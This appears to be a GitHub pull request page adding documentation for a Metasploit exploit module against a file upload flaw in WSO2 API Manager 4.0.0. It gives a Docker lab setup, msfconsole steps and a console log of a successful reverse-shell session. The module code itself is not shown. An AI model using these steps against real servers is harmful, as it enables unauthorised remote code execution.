Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added module for WSO2 API Manager Documentation File Upload Remote Co… #19647

Merged
merged 14 commits into from
Dec 16, 2024
Merged

Added module for WSO2 API Manager Documentation File Upload Remote Co… #19647

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
14 commits
Select commit Hold shift + click to select a range
09d84ea
Added module for WSO2 API Manager Documentation File Upload Remote Co…
heyder Nov 14, 2024
0f969f1
Clean-up
heyder Nov 15, 2024
e772c7a
Apply suggestions from code review
heyder Nov 22, 2024
dc445ed
Apply suggestions from code review
heyder Nov 22, 2024
c1c74a0
Do not fail on document creation
heyder Nov 26, 2024
fabced5
Apply suggestions from code review
heyder Dec 4, 2024
9642612
Fix: Handle full-location redirects in `send_request_cgi`
heyder Dec 4, 2024
d5f0c61
Fix: Ensure api_list returns a list even when created during execution
heyder Dec 5, 2024
7c9bddc
Added use of send_request_cgi!
jheysel-r7 Dec 6, 2024
f720b51
Lint
jheysel-r7 Dec 6, 2024
edb9fdc
Merge
heyder Dec 7, 2024
c953601
Fix: it needs at least 2 follows redirect
heyder Dec 7, 2024
f3f1c89
Added cleanup method
heyder Dec 8, 2024
41e7bf8
Enhance: Rollback to register_file_for_cleanup
heyder Dec 11, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
77 changes: 77 additions & 0 deletions documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
## Vulnerable Application

A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions
(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled
server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.

```yaml
services:
api-manager:
image: wso2/wso2am:4.0.0-alpine
container_name: swo2_api_manager
ports:
- "9443:9443"

```

```bash
docker-compose up
```



heyder marked this conversation as resolved.
Show resolved Hide resolved
## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use multi/http/wso2_api_manager_file_upload_rce`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
heyder marked this conversation as resolved.
Show resolved Hide resolved
1. Do: `run`
1. You should get a shell.

## Scenarios

### WSO2 API Manager 4.0.0
```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Authentication successful
[*] Listing APIs...
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload...
[+] Payload executed successfully
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100

id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
pwd
/home/wso2carbon/wso2am-4.0.0
exit
[*] 127.0.0.1 - Command shell session 2 closed.
```

## Options

### USERNAME (required)
heyder marked this conversation as resolved.
Show resolved Hide resolved

The username to authenticate with.

### PASSWORD (required)

The password of the user to authenticate with.

### RHOSTS (required)

The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html

### RPORT (required)

The target port (TCP)
Loading